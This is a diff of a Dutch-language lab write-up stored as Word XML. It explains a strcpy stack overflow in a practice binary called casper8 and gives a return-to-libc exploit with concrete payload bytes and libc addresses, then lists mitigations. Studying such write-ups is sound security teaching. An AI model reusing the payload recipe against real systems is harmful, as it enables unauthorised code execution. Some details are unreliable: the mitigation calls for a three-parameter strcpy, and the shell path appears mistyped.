-        <w:t>somedata.fp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">) te overschrijven. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Dit is mogelijk omdat de pointer boven de buffer variabele is opgeslagen en er niet gekeken wordt hoeveel </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>karakters</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> er gekopieerd worden in de buffer. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Dit laat de aanvaller toe om genoeg data als input te geven om de functie pointer te overschrijven en </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">deze </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">te </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">laten </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>wijzen naar eigen geschreven code.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Kop3"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="11" w:name="_Toc25519929"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Exploit beschrijving</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="11"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4001,7 +4106,7 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="12" w:name="_Toc25519930"/>
+      <w:bookmarkStart w:id="11" w:name="_Toc25519930"/>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
@@ -4009,7 +4114,7 @@
         </w:rPr>
         <w:t>Mitigation</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="12"/>
+      <w:bookmarkEnd w:id="11"/>
       <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
@@ -4248,14 +4353,14 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="13" w:name="_Toc25519931"/>
+      <w:bookmarkStart w:id="12" w:name="_Toc25519931"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>Advanced level: Casper61</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="13"/>
+      <w:bookmarkEnd w:id="12"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4373,7 +4478,7 @@
       <w:pPr>
         <w:pStyle w:val="Kop1"/>
         <w:rPr>
-          <w:lang w:val="en-GB"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -4382,141 +4487,1180 @@
       </w:r>
       <w:r>
         <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>8</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop3"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Omschrijving</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Het programma van casper8 i</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>s gelijkaardig aan dit van casper4. Allereerst wordt er nagekeken of er een parameter meegegeven wordt. Indien dit niet het geval is gaat het een error bericht: “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Usage</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>: /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>casper</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>/caspe</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>r8</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>YourName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>” teruggeven. Vervolgens stopt het programma met een errorcode 1.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Indien er wel een parameter meegegeven wordt gaat de “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>greetUser</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>” functie opgeroepen worden met de meegegeven input. Deze functie maakt een buffer aan van 999 karakters en gaat vervolgens de meegegeven input kopiëren naar deze buffer. Tot slot print het “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Hello</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>” gevolgd door de inhoud van de buffer.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop3"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
           <w:lang w:val="en-GB"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>Vulnerability</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>Dit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> level </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>bevat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>een</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> stack-based buffer overflow. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>In de “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>g</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>reetUser</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>” functie wordt er gebruik gemaakt van de “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>strcpy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>” functie. Deze kopieer functie gaat de input kopiëren naar de buffer. Het is een onveilige functie omdat er niet wordt gekeken of de input langer is dan 999 karakters, hierdoor kan de aanvaller meer karakters geven als input en zo het return adres</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> en verder te</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> overschrijven Het maakt geen gebruik van stack </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>canaries</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>. Het belangrijkste verschil met casper4 is dat de stack niet uitvoerbaar is.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop3"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Exploit beschrijving</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Voor dit programma </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>heb ik gebruik gemaakt van een “return-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>to</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>libc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>” attack.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Als allereerste ben ik begonnen met de grootte van de buffer op te vragen, gebruik makend van </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>gdb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>De buffer heeft een grootte van 1007 bytes.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>De exploit is als v</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>olgt opgebouwd:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Een variabele; genaamd PA</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>AXX</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>, wordt aangemaakt en geëxporteerd als environment variabele. Deze variabele is opgebouwd uit spaties (in plaats van NOP) en vervolgens de string “/bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>xh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Voer het programma uit met de volgende invoer:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>1011 keer de letter “D”. De gehele buffer (1007 bytes) moet overschreven worden samen met de frame pointer (4 bytes).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Vervolgens wordt het return adres overschreven met ”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>\xa0\x0d\xe5\xb7</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">”. Dit is het adres dat verwijst naar de “system” functie in de C </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>library</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Gevolgd door een fake stack</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> voor deze functie.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Dit wordt gevolgd door “</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>\xd0\x49\xe4\xb7</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">”, dewelke verwijst naar het adres van de “exit” functie in de C </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>library</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Het laat het programma normaal stoppen zonder enige </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>errors</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Tot slot </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>wordt</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> “</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>\x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>c0</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>fa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>xff</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>xbf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">” geprint. Dit is het adres dat verwijst naar de environment variabele </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>PA</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>AXX</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>die “/bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>xh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>” bevat</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Met deze oplossing moet er dus geen code van de stack uitgevoerd worden. De system functie </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>wordt</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> opgeroepen die “/bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>xh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>” als invoer neemt.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop3"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Mitigation</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Deze aanval kan op v</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">erschillende manieren worden </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>gemitigate</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>De implementatie van de c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>ode kan aangepast worden door gebruik maakt van de “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>strcpy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">“ functie met 3 parameters. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Deze extra parameter geeft het maximum aantal karakters dat</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> gekopieerd kan worden naar de buffer. Specifiek in dit programma is het maximum gelijk aan 999 karakters.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Een tweede manier is d</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">oor gebruik te maken van stack </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>canaries</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Deze aanval vereist het volledig overschrijven tot na het return adres. Hierdoor kunnen stack </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>canaries</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> gebruikt worden.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
